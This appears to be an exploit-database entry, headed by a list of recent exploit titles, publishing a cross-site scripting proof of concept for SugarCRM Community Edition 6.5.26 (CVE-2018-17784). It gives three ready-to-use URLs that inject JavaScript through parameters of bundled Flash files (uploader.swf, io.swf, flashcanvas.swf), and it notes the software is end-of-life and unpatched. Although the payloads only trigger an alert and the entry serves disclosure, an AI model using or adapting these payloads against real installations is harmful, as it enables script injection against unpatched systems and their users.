
22 changes to exploits/shellcodes Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection Wikidforum 2.20 - Cross-Site Scripting WAGO 750-881 01.09.18 - Cross-Site Scripting E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection jQuery-File-Upload 9.22.0 - Arbitrary File Upload Phoenix Contact WebVisit 6.40.00 - Password Disclosure HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting FluxBB < 1.5.6 - SQL Injection
26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
# Exploit Title: SugarCRM 6.5.26 - Cross-Site Scripting
|
|
# Date: 2018-09-29
|
|
# Exploit Author: Purplemet Security
|
|
# Author Website: https://www.purplemet.com/
|
|
# Vendor Homepage: https://www.sugarcrm.com/
|
|
# Software Link: https://sourceforge.net/projects/sugarcrm/
|
|
# Version: 6.5.26
|
|
# Tested on: Ubuntu 16.04
|
|
# CVE : CVE-2018-17784
|
|
|
|
# Description
|
|
# A vulnerability in uploader.swf, io.swf and flashcanvas.swf in SugarCRM Community Edition 6.5.26
|
|
# could allow an unauthenticated, remote attacker to conduct a cross-site scripting
|
|
# (XSS) attack on a targeted system.
|
|
# SugarCRM Community Edition 6.5 had reached its end-of-life and is no longer supported.
|
|
# 6.5.26 is the last version and no patches will be provided by the vendor.
|
|
|
|
# PoC:
|
|
# 1)
|
|
http://192.168.13.37/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}
|
|
|
|
# 2)
|
|
http://192.168.13.37/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}
|
|
|
|
# 3)
|
|
http://192.168.13.37/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)} |